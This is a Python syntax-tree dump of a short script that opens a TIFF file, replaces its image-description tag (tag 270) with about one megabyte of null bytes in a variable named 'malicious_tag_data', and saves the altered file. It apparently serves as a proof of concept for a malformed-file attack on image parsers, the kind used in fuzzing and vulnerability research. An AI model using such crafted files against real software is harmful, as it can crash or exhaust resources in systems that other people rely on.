Module(
    body=[
        ImportFrom(
            module='PIL',
            names=[
                alias(name='Image')],
            level=0),
        Assign(
            targets=[
                Name(id='img', ctx=Store())],
            value=Call(
                func=Attribute(
                    value=Name(id='Image', ctx=Load()),
                    attr='open',
                    ctx=Load()),
                args=[
                    Constant(value='image.tif')],
                keywords=[])),
        Assign(
            targets=[
                Name(id='tag_data', ctx=Store())],
            value=Subscript(
                value=Attribute(
                    value=Name(id='img', ctx=Load()),
                    attr='tag',
                    ctx=Load()),
                slice=Constant(value=270),
                ctx=Load())),
        Assign(
            targets=[
                Name(id='malicious_tag_data', ctx=Store())],
            value=BinOp(
                left=Constant(value=b'\x00'),
                op=Mult(),
                right=Constant(value=1048576))),
        Assign(
            targets=[
                Subscript(
                    value=Attribute(
                        value=Name(id='img', ctx=Load()),
                        attr='tag',
                        ctx=Load()),
                    slice=Constant(value=270),
                    ctx=Store())],
            value=Name(id='malicious_tag_data', ctx=Load())),
        Expr(
            value=Call(
                func=Attribute(
                    value=Name(id='img', ctx=Load()),
                    attr='save',
                    ctx=Load()),
                args=[
                    Constant(value='output.tif')],
                keywords=[]))],
    type_ignores=[])